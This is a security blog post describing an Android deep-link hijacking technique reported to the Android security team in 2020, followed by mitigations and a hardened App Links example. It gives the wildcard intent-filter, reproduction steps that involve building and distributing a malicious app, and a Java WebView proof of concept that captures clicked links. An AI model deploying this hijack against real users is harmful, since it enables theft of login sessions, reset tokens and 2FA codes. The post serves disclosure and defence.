In this blog, I will explain how I discovered a vulnerability that allowed me to take over multiple accounts by exploiting deep links in Android applications.

Deep Link

Deep links are a type of link that sends users directly to an app instead of a website or store. They are used to navigate users to specific in-app locations, saving time and improving user experience.

Deep linking works by registering a custom URL scheme, a Universal Link (iOS) or an intent URL (Android) so that the link opens the app directly if it is already installed. These links are also used for campaigns or specific events.

Attack

Android provides a mechanism called "App Links," built specifically for routing links to mobile applications. Because the user's choice of handler is kept across app updates, deep link hijacking remains possible even after the app is updated.

Here's how an attacker can exploit it:

  1. The attacker develops a malicious app with a deep link hijacking payload.
  2. When a user clicks on a deep link, a prompt appears asking whether to open the link "JUST ONCE" or "ALWAYS."
  3. If the user selects "ALWAYS," the malicious app is triggered whenever a deep link is clicked.
  4. The attacker updates the app to extend the payload, allowing it to hijack any deep link.
  5. Users receive and install the update from the Google Play Store.
  6. After the update, any clicked link triggers the malware without user interaction.

Technical Explanation

The vulnerability arises from the misuse of Android's intent-filter. By modifying the deep link host pattern in an app update, an attacker can hijack all URLs and force them to open inside the malicious application.


    <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <!-- the host the user originally chose "ALWAYS" for -->
        <data android:scheme="https" android:host="cappriciosec.com"/>
        <!-- added in the update: a leading wildcard matches every .com host -->
        <data android:scheme="https" android:host="*.com"/>
    </intent-filter>

Initially, users choose the app ("ALWAYS") only for links to cappriciosec.com. After the update, the wildcard host *.com makes the same choice apply to every .com domain, so sensitive links (Google login, banking pages, etc.) open inside the malicious app.

Impact

This vulnerability can be exploited to:

  • Hijack session tokens
  • Bypass two-factor authentication (2FA)
  • Steal password reset links or tokens
  • Compromise account credentials
  • Intercept and manipulate web requests

Steps to Reproduce

  1. Develop an Android malware with a deep link hijacking payload.
  2. Distribute the malicious app and trick users into installing it.
  3. Users grant permission to open specific deep links.
  4. Update the app with a new payload to hijack all deep links.
  5. Now, any link clicked by the user triggers the malware automatically.

Proof of Concept (POC)

    import android.net.Uri;
    import android.os.Bundle;
    import android.webkit.WebSettings;
    import android.webkit.WebView;
    import android.webkit.WebViewClient;
    import android.widget.Toast;
    import androidx.appcompat.app.AppCompatActivity;

    public class MainActivity extends AppCompatActivity {
        private WebView webview;
        private Uri url;

        @Override
        protected void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            setContentView(R.layout.activity_main);

            // Both conditions must hold (&& rather than ||): with || the second
            // call would throw a NullPointerException when no intent is present.
            if (getIntent() != null && getIntent().getData() != null) {
                // The URI the user clicked, delivered through the intent-filter above
                url = getIntent().getData();
                webview = findViewById(R.id.web);
                webview.setWebViewClient(new WebViewClient());

                // Configure the WebView before loading the page
                WebSettings webSettings = webview.getSettings();
                webSettings.setJavaScriptEnabled(true);

                // Render the hijacked link inside the app's own WebView
                webview.loadUrl(String.valueOf(url));

                Toast.makeText(getApplicationContext(), "Hacked", Toast.LENGTH_SHORT).show();
            }
        }
    }



Mitigation

To prevent deep link hijacking, developers should:

  • Verify package name and domain integrity before opening a deep link.
  • Use Digital Asset Links (DAL) to validate the app's ownership of a domain.
  • Restrict the scope of intent-filters and avoid wildcard hosts.
  • Enforce strong authentication before processing sensitive deep links.
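A hardened version of the filter shown earlier, as an added example that is not from the original post: it declares one explicit host (no wildcard) and sets android:autoVerify="true", so Android checks the domain's Digital Asset Links at install time and routes https links for that host straight to the verified app without ever showing the "JUST ONCE" / "ALWAYS" chooser. The activity name, package name and certificate fingerprint below are placeholders.

```xml
<!-- AndroidManifest.xml: verified App Link for a single host (added example) -->
<activity android:name=".MainActivity" android:exported="true">
    <intent-filter android:autoVerify="true">
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <!-- exactly one host; never a wildcard such as *.com -->
        <data android:scheme="https" android:host="cappriciosec.com"/>
    </intent-filter>
</activity>

<!-- The matching statement must be served over HTTPS at
     https://cappriciosec.com/.well-known/assetlinks.json
     with Content-Type application/json. package_name and the SHA-256
     fingerprint are placeholders; use the app's real signing certificate.

[{
  "relation": ["delegate_permission/common.handle_all_urls"],
  "target": {
    "namespace": "android_app",
    "package_name": "com.example.placeholder",
    "sha256_cert_fingerprints": ["AA:BB:CC:(placeholder fingerprint):FF"]
  }
}]
-->
```

Verification only succeeds for apps whose package name and signing certificate appear in the domain's assetlinks.json, so an unrelated app cannot claim the host; on Android 12 and later the result can be inspected with adb shell pm get-app-links <package>.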

Timeline

  • Reported to Android OS Security Team: August 7, 2020
  • Issue Created: August 10, 2020
  • Assigned Date: August 11, 2020

Thanks for reading! If you found this useful, feel free to share it with your fellow hunters. Happy hacking!